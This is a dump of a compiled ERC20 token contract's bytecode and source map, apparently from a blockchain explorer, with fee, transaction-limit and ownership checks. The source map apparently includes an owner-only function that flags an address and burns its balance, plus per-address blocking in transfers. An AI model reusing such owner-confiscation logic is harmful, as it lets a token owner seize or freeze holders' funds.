388e81613852565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473207460008201527f6865206d6178207472616e73616374696f6e20616d6f756e7400000000000000602082015250565b60006138f1603983612a24565b91506138fc82613895565b604082019050919050565b60006020820190508181036000830152613920816138e4565b9050919050565b6000613932826129e5565b915061393d836129e5565b925082820261394b816129e5565b9150828204841483151761396257613961612e6d565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b60006139a3826129e5565b91506139ae836129e5565b9250826139be576139bd613969565b5b828204905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006139ff602083612a24565b9150613a0a826139c9565b602082019050919050565b60006020820190508181036000830152613a2e816139f2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000613a91602683612a24565b9150613a9c82613a35565b604082019050919050565b60006020820190508181036000830152613ac081613a84565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b613b5a816129a9565b82525050565b6000613b6c8383613b51565b60208301905092915050565b6000602082019050919050565b6000613b9082613b25565b613b9a8185613b30565b9350613ba583613b41565b8060005b83811015613bd6578151613bbd8882613b60565b9750613bc883613b78565b925050600181019050613ba9565b5085935050505092915050565b600060a082019050613bf860008301886129ef565b613c0560208301876129ef565b8181036040830152613c178186613b85565b9050613c2660608301856129bb565b613c3360808301846129ef565b969550505050505056fea2646970667358221220f0620b75908cef86b78abc4089e5036fc251737fe508d767664e338f17a7810c64736f6c63430008130033
Deployed Bytecode Sourcemap
26844:8016:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;27211:64;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27154:50;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9958:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29207:140;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12318:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27766:51;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11087:108;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13099:261;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;28715:480;;;:::i;:::-;;27329:34;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10929:93;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27653:32;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13769:238;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27615:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27824:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;34394:186;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;33261:156;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;34748:109;;;;;;;;;;;;;:::i;:::-;;11258:127;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3384:103;;;;;;;;;;;;;:::i;:::-;;27372:50;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27036:52;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2596:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10177:104;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;34202:184;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14510:436;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11591:193;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27095:52;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27940:30;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;34588:115;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11847:151;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27284:38;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3642:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;29355:175;;;;;;;;;;;;;:::i;:::-;;27480:25;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27211:64;;;;;;;;;;;;;:::o;27154:50::-;;;;:::o;9958:100::-;10012:13;10045:5;10038:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9958:100;:::o;29207:140::-;2477:16;:14;:16::i;:::-;29293:5:::1;29282:2;:8;29285:4;29282:8;;;;;;;;;;;;;;;;:16;;;;;;;;;;;;;;;;;;29300:39;29306:4;29330:8;;29312:15;29322:4;29312:9;:15::i;:::-;:26;;;;:::i;:::-;29300:5;:39::i;:::-;29207:140:::0;:::o;12318:201::-;12401:4;12418:13;12434:12;:10;:12::i;:::-;12418:28;;12457:32;12466:5;12473:7;12482:6;12457:8;:32::i;:::-;12507:4;12500:11;;;12318:201;;;;:::o;27766:51::-;;;:::o;11087:108::-;11148:7;11175:12;;11168:19;;11087:108;:::o;13099:261::-;13196:4;13213:15;13231:12;:10;:12::i;:::-;13213:30;;13254:38;13270:4;13276:7;13285:6;13254:15;:38::i;:::-;13303:27;13313:4;13319:2;13323:6;13303:9;:27::i;:::-;13348:4;13341:11;;;13099:261;;;;;:::o;28715:480::-;2404:13;:11;:13::i;:::-;28808:15:::1;:23;;;:25;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;28790:55;;;28854:4;28861:15;:20;;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;28790:94;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;28774:13;;:110;;;;;;;;;;;;;;;;;;28895:68;28912:4;28927:15;28945:17;28895:8;:68::i;:::-;28974:15;:31;;;29013:9;29046:4;29066:24;29084:4;29066:9;:24::i;:::-;29105:1;29122::::0;29139:7:::1;:5;:7::i;:::-;29161:15;28974:213;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;28715:480::o:0;27329:34::-;;;;;;;;;;;;;;;;;;;;;;:::o;10929:93::-;10987:5;11012:2;11005:9;;10929:93;:::o;27653:32::-;;;;:::o;13769:238::-;13857:4;13874:13;13890:12;:10;:12::i;:::-;13874:28;;13913:64;13922:5;13929:7;13966:10;13938:25;13948:5;13955:7;13938:9;:25::i;:::-;:38;;;;:::i;:::-;13913:8;:64::i;:::-;13995:4;13988:11;;;13769:238;;;;:::o;27615:31::-;;;;:::o;27824:28::-;;;;;;;;;;;;;:::o;34394:186::-;2404:13;:11;:13::i;:::-;34470:5:::1;34463:22;;;34500:8;;;;;;;;;;;34530:5;34523:23;;;34555:4;34523:38;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;34463:109;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;34394:186:::0;:::o;33261:156::-;33297:4;33322:8;;;;;;;;;;;33314:26;;:43;33341:15;;33314:43;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33386:1;33368:15;:19;;;;33405:4;33398:11;;33261:156;:::o;34748:109::-;2404:13;:11;:13::i;:::-;27010:19:::1;34801:11;:21;;;;27010:19;34824:15;:25;;;;34748:109::o:0;11258:127::-;11332:7;11359:9;:18;11369:7;11359:18;;;;;;;;;;;;;;;;11352:25;;11258:127;;;:::o;3384:103::-;2404:13;:11;:13::i;:::-;3449:30:::1;3476:1;3449:18;:30::i;:::-;3384:103::o:0;27372:50::-;;;;;;;;;;;;;;;;;;;;;;:::o;27036:52::-;;;;:::o;2596:87::-;2642:7;2669:6;;;;;;;;;;;2662:13;;2596:87;:::o;10177:104::-;10233:13;10266:7;10259:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10177:104;:::o;34202:184::-;34255:4;2404:13;:11;:13::i;:::-;34287:12:::1;34272;;:27;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;34325:1;34310:12;:16;;;;34353:1;34337:13;:17;;;;34374:4;34367:11;;34202:184:::0;:::o;14510:436::-;14603:4;14620:13;14636:12;:10;:12::i;:::-;14620:28;;14659:24;14686:25;14696:5;14703:7;14686:9;:25::i;:::-;14659:52;;14750:15;14730:16;:35;;14722:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;14843:60;14852:5;14859:7;14887:15;14868:16;:34;14843:8;:60::i;:::-;14934:4;14927:11;;;;14510:436;;;;:::o;11591:193::-;11670:4;11687:13;11703:12;:10;:12::i;:::-;11687:28;;11726;11736:5;11743:2;11747:6;11726:9;:28::i;:::-;11772:4;11765:11;;;11591:193;;;;:::o;27095:52::-;;;;:::o;27940:30::-;;;;:::o;34588:115::-;2404:13;:11;:13::i;:::-;34688:7:::1;34677:2;:8;34680:4;34677:8;;;;;;;;;;;;;;;;:18;;;;;;;;;;;;;;;;;;34588:115:::0;;:::o;11847:151::-;11936:7;11963:11;:18;11975:5;11963:18;;;;;;;;;;;;;;;:27;11982:7;11963:27;;;;;;;;;;;;;;;;11956:34;;11847:151;;;;:::o;27284:38::-;;;;;;;;;;;;;;;;;;;;;;:::o;3642:201::-;2404:13;:11;:13::i;:::-;3751:1:::1;3731:22;;:8;:22;;::::0;3723:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;3807:28;3826:8;3807:18;:28::i;:::-;3642:201:::0;:::o;29355:175::-;2404:13;:11;:13::i;:::-;29415:14:::1;;;;;;;;;;;29414:15;29406:54;;;;;;;;;;;;:::i;:::-;;;;;;;;;29488:4;29471:14;;:21;;;;;;;;;;;;;;;;;;29518:4;29503:12;;:19;;;;;;;;;;;;;;;;;;29355:175::o:0;27480:25::-;;;;;;;;;;;;;:::o;2901:139::-;2984:8;;;;;;;;;;;2968:24;;:12;:10;:12::i;:::-;:24;;;2960:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;2901:139::o;17390:675::-;17493:1;17474:21;;:7;:21;;;17466:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;17546:49;17567:7;17584:1;17588:6;17546:20;:49::i;:::-;17608:22;17633:9;:18;17643:7;17633:18;;;;;;;;;;;;;;;;17608:43;;17688:6;17670:14;:24;;17662:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;17807:6;17790:14;:23;17769:9;:18;17779:7;17769:18;;;;;;;;;;;;;;;:44;;;;17924:6;17908:12;;:22;;;;;;;;;;;17985:1;17959:37;;17968:7;17959:37;;;17989:6;17959:37;;;;;;:::i;:::-;;;;;;;;18009:48;18029:7;18046:1;18050:6;18009:19;:48::i;:::-;17455:610;17390:675;;:::o;983:98::-;1036:7;1063:10;1056:17;;983:98;:::o;18503:346::-;18622:1;18605:19;;:5;:19;;;18597:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18703:1;18684:21;;:7;:21;;;18676:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18787:6;18757:11;:18;18769:5;18757:18;;;;;;;;;;;;;;;:27;18776:7;18757:27;;;;;;;;;;;;;;;:36;;;;18825:7;18809:32;;18818:5;18809:32;;;18834:6;18809:32;;;;;;:::i;:::-;;;;;;;;18503:346;;;:::o;19140:419::-;19241:24;19268:25;19278:5;19285:7;19268:9;:25::i;:::-;19241:52;;19328:17;19308:16;:37;19304:248;;19390:6;19370:16;:26;;19362:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19474:51;19483:5;19490:7;19518:6;19499:16;:25;19474:8;:51::i;:::-;19304:248;19230:329;19140:419;;;:::o;29538:2861::-;29688:1;29672:18;;:4;:18;;;29664:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;29765:1;29751:16;;:2;:16;;;29743:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;29823:6;:12;29830:4;29823:12;;;;;;;;;;;;;;;;;;;;;;;;;29822:13;:28;;;;;29840:6;:10;29847:2;29840:10;;;;;;;;;;;;;;;;;;;;;;;;;29839:11;29822:28;29818:107;;;29875:14;;;;;;;;;;;29867:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;29818:107;29942:2;:8;29945:4;29942:8;;;;;;;;;;;;;;;;;;;;;;;;;29941:9;:20;;;;;29955:2;:6;29958:2;29955:6;;;;;;;;;;;;;;;;;;;;;;;;;29954:7;29941:20;29937:398;;;29989:13;;;;;;;;;;;29983:19;;:2;:19;;;29979:345;;30041:11;;30031:6;:21;;30023:95;;;;;;;;;;;;:::i;:::-;;;;;;;;;30195:15;;30177:13;30187:2;30177:9;:13::i;:::-;30168:6;:22;;;;:::i;:::-;30167:43;;30137:171;;;;;;;;;;;;:::i;:::-;;;;;;;;;29979:345;29937:398;30347:22;30372:6;30347:31;;30394:6;:12;30401:4;30394:12;;;;;;;;;;;;;;;;;;;;;;;;;30393:13;:28;;;;;30411:6;:10;30418:2;30411:10;;;;;;;;;;;;;;;;;;;;;;;;;30410:11;30393:28;30389:1951;;;30451:13;;;;;;;;;;;30443:21;;:4;:21;;;:44;;;;30474:13;;;;;;;;;;;30468:19;;:2;:19;;;30443:44;30438:1891;;;30527:11;;30517:6;:21;;30509:91;;;;;;;;;;;;:::i;:::-;;;;;;;;;30665:4;30648:21;;:13;;;;;;;;;;;:21;;;:53;;;;;30695:2;:6;30698:2;30695:6;;;;;;;;;;;;;;;;;;;;;;;;;30694:7;30648:53;:99;;;;;30742:4;30726:21;;:4;:21;;;;30648:99;30622:505;;;30812:12;30796:28;;;;;;;;:::i;:::-;;:12;;;;;;;;;;;:28;;;;;;;;:::i;:::-;;;30792:114;;30878:4;30853:18;:22;30872:2;30853:22;;;;;;;;;;;;;;;;:29;;;;;;;;;;;;;;;;;;30792:114;30930:17;30976:3;30960:12;;30951:6;:21;;;;:::i;:::-;30950:29;;;;:::i;:::-;30930:49;;31002:47;31018:4;31032;31039:9;31002:15;:47::i;:::-;31098:9;31089:6;:18;;;;:::i;:::-;31072:35;;30767:360;30622:505;31190:2;31173:19;;:13;;;;;;;;;;;:19;;;:53;;;;;31218:2;:8;31221:4;31218:8;;;;;;;;;;;;;;;;;;;;;;;;;31217:9;31173:53;:97;;;;;31265:4;31251:19;;:2;:19;;;;31173:97;:134;;;;;31295:12;;;;;;;;;;;31173:134;:174;;;;;31334:13;;;;;;;;;;;31333:14;31173:174;31147:773;;;31412:15;31430:13;;31412:31;;31498:4;31470:32;;:18;:24;31489:4;31470:24;;;;;;;;;;;;;;;;;;;;;;;;;:32;;;31466:110;;31541:11;;31531:21;;31466:110;31616:4;31600:13;;:20;;;;;;;;;;;;;;;;;;31643:16;:14;:16::i;:::-;31698:5;31682:13;;:21;;;;;;;;;;;;;;;;;;31728:17;31769:3;31758:7;31749:6;:16;;;;:::i;:::-;31748:24;;;;:::i;:::-;31728:44;;31795:47;31811:4;31825;31832:9;31795:15;:47::i;:::-;31891:9;31882:6;:18;;;;:::i;:::-;31865:35;;31367:553;;31147:773;30438:1891;;;32027:4;31999:32;;:18;:24;32018:4;31999:24;;;;;;;;;;;;;;;;;;;;;;;;;:32;;;:76;;;;;32073:2;32056:19;;:13;;;;;;;;;;;:19;;;;31999:76;31973:341;;;32118:17;32163:3;32148:11;;32139:6;:20;;;;:::i;:::-;32138:28;;;;:::i;:::-;32118:48;;32189:47;32205:4;32219;32226:9;32189:15;:47::i;:::-;32285:9;32276:6;:18;;;;:::i;:::-;32259:35;;32095:219;31973:341;30438:1891;30389:1951;32350:41;32366:4;32372:2;32376:14;32350:15;:41::i;:::-;29651:2748;29538:2861;;;:::o;2761:132::-;2836:12;:10;:12::i;:::-;2825:23;;:7;:5;:7::i;:::-;:23;;;2817:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;2761:132::o;4003:191::-;4077:16;4096:6;;;;;;;;;;;4077:25;;4122:8;4113:6;;:17;;;;;;;;;;;;;;;;;;4177:8;4146:40;;4167:8;4146:40;;;;;;;;;;;;4066:128;4003:191;:::o;20159:91::-;;;;:::o;20854:90::-;;;;:::o;15416:806::-;15529:1;15513:18;;:4;:18;;;15505:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15606:1;15592:16;;:2;:16;;;15584:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;15661:38;15682:4;15688:2;15692:6;15661:20;:38::i;:::-;15712:19;15734:9;:15;15744:4;15734:15;;;;;;;;;;;;;;;;15712:37;;15783:6;15768:11;:21;;15760:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;15900:6;15886:11;:20;15868:9;:15;15878:4;15868:15;;;;;;;;;;;;;;;:38;;;;16103:6;16086:9;:13;16096:2;16086:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;16153:2;16138:26;;16147:4;16138:26;;;16157:6;16138:26;;;;;;:::i;:::-;;;;;;;;16177:37;16197:4;16203:2;16207:6;16177:19;:37::i;:::-;15494:728;15416:806;;;:::o;32407:845::-;32485:1;32457:24;32475:4;32457:9;:24::i;:::-;:29;32453:68;32503:7;32453:68;32531:19;32576:28;32607:24;32625:4;32607:9;:24::i;:::-;32576:55;;32646:21;32670;32646:45;;32706:18;32727:19;32737:8;;;;;;;;;;;32727:9;:19::i;:::-;32706:40;;32761:12;32815:13;;32792:20;:36;32788:446;;;32865:21;32849:37;;32905:42;32923:20;32945:1;32905:17;:42::i;:::-;33004:13;32980:21;:37;;;;:::i;:::-;32966:51;;33053:13;;33040:10;:26;33036:134;;;33124:7;:25;;33148:1;33124:25;;;33134:11;33124:25;33109:11;:41;;;;:::i;:::-;33091:15;:59;;;;33036:134;33207:11;33188:15;;:30;;;;;;;:::i;:::-;;;;;;;;32788:446;32561:684;;;;32442:810;32407:845;:::o;33606:588::-;33723:21;33761:1;33747:16;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33723:40;;33792:4;33774;33779:1;33774:7;;;;;;;;:::i;:::-;;;;;;;:23;;;;;;;;;;;33818:15;:20;;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;33808:4;33813:1;33808:7;;;;;;;;:::i;:::-;;;;;;;:32;;;;;;;;;;;33868:4;33853:29;;;33905:15;33936:17;33853:111;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;33977:15;:66;;;34058:11;34084:14;34113:4;34140;34160:15;33977:209;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33712:482;33606:588;;:::o;7:126:1:-;44:7;84:42;77:5;73:54;62:65;;7:126;;;:::o;139:96::-;176:7;205:24;223:5;205:24;:::i;:::-;194:35;;139:96;;;:::o;241:118::-;328:24;346:5;328:24;:::i;:::-;323:3;316:37;241:118;;:::o;365:222::-;458:4;496:2;485:9;481:18;473:26;;509:71;577:1;566:9;562:17;553:6;509:71;:::i;:::-;365:222;;;;:::o;593:77::-;630:7;659:5;648:16;;593:77;;;:::o;676:118::-;763:24;781:5;763:24;:::i;:::-;758:3;751:37;676:118;;:::o;800:222::-;893:4;931:2;920:9;916:18;908:26;;944:71;1012:1;1001:9;997:17;988:6;944:71;:::i;:::-;800:222;;;;:::o;1028:99::-;1080:6;1114:5;1108:12;1098:22;;1028:99;;;:::o;1133:169::-;1217:11;1251:6;1246:3;1239:19;1291:4;1286:3;1282:14;1267:29;;1133:169;;;;:::o;1308:246::-;1389:1;1399:113;1413:6;1410:1;1407:13;1399:113;;;1498:1;1493:3;1489:11;1483:18;1479:1;1474:3;1470:11;1463:39;1435:2;1432:1;1428:10;1423:15;;1399:113;;;1546:1;1537:6;1532:3;1528:16;1521:27;1370:184;1308:246;;;:::o;1560:102::-;1601:6;1652:2;1648:7;1643:2;1636:5;1632:14;1628:28;1618:38;;1560:102;;;:::o;1668:377::-;1756:3;1784:39;1817:5;1784:39;:::i;:::-;1839:71;1903:6;1898:3;1839:71;:::i;:::-;1832:78;;1919:65;1977:6;1972:3;1965:4;1958:5;1954:16;1919:65;:::i;:::-;2009:29;2031:6;2009:29;:::i;:::-;2004:3;2000:39;1993:46;;1760:285;1668:377;;;;:::o;2051:313::-;2164:4;2202:2;2191:9;2187:18;2179:26;;2251:9;2245:4;2241:20;2237:1;2226:9;2222:17;2215:47;2279:78;2352:4;2343:6;2279:78;:::i;:::-;2271:86;;2051:313;;;;:::o;2451:117::-;2560:1;2557;2550:12;2697:122;2770:24;2788:5;2770:24;:::i;:::-;2763:5;2760:35;2750:63;;2809:1;2806;2799:12;2750:63;2697:122;:::o;2825:139::-;2871:5;2909:6;2896:20;2887:29;;2925:33;2952:5;2925:33;:::i;:::-;2825:139;;;;:::o;2970:329::-;3029:6;3078:2;3066:9;3057:7;3053:23;3049:32;3046:119;;;3084:79;;:::i;:::-;3046:119;3204:1;3229:53;3274:7;3265:6;3254:9;3250:22;3229:53;:::i;:::-;3219:63;;3175:117;2970:329;;;;:::o;3305:122::-;3378:24;3396:5;3378:24;:::i;:::-;3371:5;3368:35;3358:63;;3417:1;3414;3407:12;3358:63;3305:122;:::o;3433:139::-;3479:5;3517:6;3504:20;3495:29;;3533:33;3560:5;3533:33;:::i;:::-;3433:139;;;;:::o;3578:474::-;3646:6;3654;3703:2;3691:9;3682:7;3678:23;3674:32;3671:119;;;3709:79;;:::i;:::-;3671:119;3829:1;3854:53;3899:7;3890:6;3879:9;3875:22;3854:53;:::i;:::-;3844:63;;3800:117;3956:2;3982:53;4027:7;4018:6;4007:9;4003:22;3982:53;:::i;:::-;3972:63;;3927:118;3578:474;;;;;:::o;4058:90::-;4092:7;4135:5;4128:13;4121:21;4110:32;;4058:90;;;:::o;4154:109::-;4235:21;4250:5;4235:21;:::i;:::-;4230:3;4223:34;4154:109;;:::o;4269:210::-;4356:4;4394:2;4383:9;4379:18;4371:26;;4407:65;4469:1;4458:9;4454:17;4445:6;4407:65;:::i;:::-;4269:210;;;;:::o;4485:60::-;4513:3;4534:5;4527:12;;4485:60;;;:::o;4551:142::-;4601:9;4634:53;4652:34;4661:24;4679:5;4661:24;:::i;:::-;4652:34;:::i;:::-;4634:53;:::i;:::-;4621:66;;4551:142;;;:::o;4699:126::-;4749:9;4782:37;4813:5;4782:37;:::i;:::-;4769:50;;4699:126;;;:::o;4831:153::-;4908:9;4941:37;4972:5;4941:37;:::i;:::-;4928:50;;4831:153;;;:::o;4990:185::-;5104:64;5162:5;5104:64;:::i;:::-;5099:3;5092:77;4990:185;;:::o;5181:276::-;5301:4;5339:2;5328:9;5324:18;5316:26;;5352:98;5447:1;5436:9;5432:17;5423:6;5352:98;:::i;:::-;5181:276;;;;:::o;5463:619::-;5540:6;5548;5556;5605:2;5593:9;5584:7;5580:23;5576:32;5573:119;;;5611:79;;:::i;:::-;5573:119;5731:1;5756:53;5801:7;5792:6;5781:9;5777:22;5756:53;:::i;:::-;5746:63;;5702:117;5858:2;5884:53;5929:7;5920:6;5909:9;5905:22;5884:53;:::i;:::-;5874:63;;5829:118;5986:2;6012:53;6057:7;6048:6;6037:9;6033:22;6012:53;:::i;:::-;6002:63;;5957:118;5463:619;;;;;:::o;6088:86::-;6123:7;6163:4;6156:5;6152:16;6141:27;;6088:86;;;:::o;6180:112::-;6263:22;6279:5;6263:22;:::i;:::-;6258:3;6251:35;6180:112;;:::o;6298:214::-;6387:4;6425:2;6414:9;6410:18;6402:26;;6438:67;6502:1;6491:9;6487:17;6478:6;6438:67;:::i;:::-;6298:214;;;;:::o;6518:116::-;6588:21;6603:5;6588:21;:::i;:::-;6581:5;6578:32;6568:60;;6624:1;6621;6614:12;6568:60;6518:116;:::o;6640:133::-;6683:5;6721:6;6708:20;6699:29;;6737:30;6761:5;6737:30;:::i;:::-;6640:133;;;;:::o;6779:468::-;6844:6;6852;6901:2;6889:9;6880:7;6876:23;6872:32;6869:119;;;6907:79;;:::i;:::-;6869:119;7027:1;7052:53;7097:7;7088:6;7077:9;7073:22;7052:53;:::i;:::-;7042:63;;6998:117;7154:2;7180:50;7222:7;7213:6;7202:9;7198:22;7180:50;:::i;:::-;7170:60;;7125:115;6779:468;;;;;:::o;7253:474::-;7321:6;7329;7378:2;7366:9;7357:7;7353:23;7349:32;7346:119;;;7384:79;;:::i;:::-;7346:119;7504:1;7529:53;7574:7;7565:6;7554:9;7550:22;7529:53;:::i;:::-;7519:63;;7475:117;7631:2;7657:53;7702:7;7693:6;7682:9;7678:22;7657:53;:::i;:::-;7647:63;;7602:118;7253:474;;;;;:::o;7733:180::-;7781:77;7778:1;7771:88;7878:4;7875:1;7868:15;7902:4;7899:1;7892:15;7919:115;8002:1;7995:5;7992:12;7982:46;;8008:18;;:::i;:::-;7982:46;7919:115;:::o;8040:131::-;8087:7;8116:5;8105:16;;8122:43;8159:5;8122:43;:::i;:::-;8040:131;;;:::o;8177:::-;8235:9;8268:34;8296:5;8268:34;:::i;:::-;8255:47;;8177:131;;;:::o;8314:147::-;8409:45;8448:5;8409:45;:::i;:::-;8404:3;8397:58;8314:147;;:::o;8467:238::-;8568:4;8606:2;8595:9;8591:18;8583:26;;8619:79;8695:1;8684:9;8680:17;8671:6;8619:79;:::i;:::-;8467:238;;;;:::o;8711:180::-;8759:77;8756:1;8749:88;8856:4;8853:1;8846:15;8880:4;8877:1;8870:15;8897:320;8941:6;8978:1;8972:4;8968:12;8958:22;;9025:1;9019:4;9015:12;9046:18;9036:81;;9102:4;9094:6;9090:17;9080:27;;9036:81;9164:2;9156:6;9153:14;9133:18;9130:38;9127:84;;9183:18;;:::i;:::-;9127:84;8948:269;8897:320;;;:::o;9223:180::-;9271:77;9268:1;9261:88;9368:4;9365:1;9358:15;9392:4;9389:1;9382:15;9409:194;9449:4;9469:20;9487:1;9469:20;:::i;:::-;9464:25;;9503:20;9521:1;9503:20;:::i;:::-;9498:25;;9547:1;9544;9540:9;9532:17;;9571:1;9565:4;9562:11;9559:37;;;9576:18;;:::i;:::-;9559:37;9409:194;;;;:::o;9609:143::-;9666:5;9697:6;9691:13;9682:22;;9713:33;9740:5;9713:33;:::i;:::-;9609:143;;;;:::o;9758:351::-;9828:6;9877:2;9865:9;9856:7;9852:23;9848:32;9845:119;;;9883:79;;:::i;:::-;9845:119;10003:1;10028:64;10084:7;10075:6;10064:9;10060:22;10028:64;:::i;:::-;10018:74;;9974:128;9758:351;;;;:::o;10115:332::-;10236:4;10274:2;10263:9;10259:18;10251:26;;10287:71;10355:1;10344:9;10340:17;10331:6;10287:71;:::i;:::-;10368:72;10436:2;10425:9;10421:18;10412:6;10368:72;:::i;:::-;10115:332;;;;;:::o;10453:85::-;10498:7;10527:5;10516:16;;10453:85;;;:::o;10544:158::-;10602:9;10635:61;10653:42;10662:32;10688:5;10662:32;:::i;:::-;10653:42;:::i;:::-;10635:61;:::i;:::-;10622:74;;10544:158;;;:::o;10708:147::-;10803:45;10842:5;10803:45;:::i;:::-;10798:3;10791:58;10708:147;;:::o;10861:807::-;11110:4;11148:3;11137:9;11133:19;11125:27;;11162:71;11230:1;11219:9;11215:17;11206:6;11162:71;:::i;:::-;11243:72;11311:2;11300:9;11296:18;11287:6;11243:72;:::i;:::-;11325:80;11401:2;11390:9;11386:18;11377:6;11325:80;:::i;:::-;11415;11491:2;11480:9;11476:18;11467:6;11415:80;:::i;:::-;11505:73;11573:3;11562:9;11558:19;11549:6;11505:73;:::i;:::-;11588;11656:3;11645:9;11641:19;11632:6;11588:73;:::i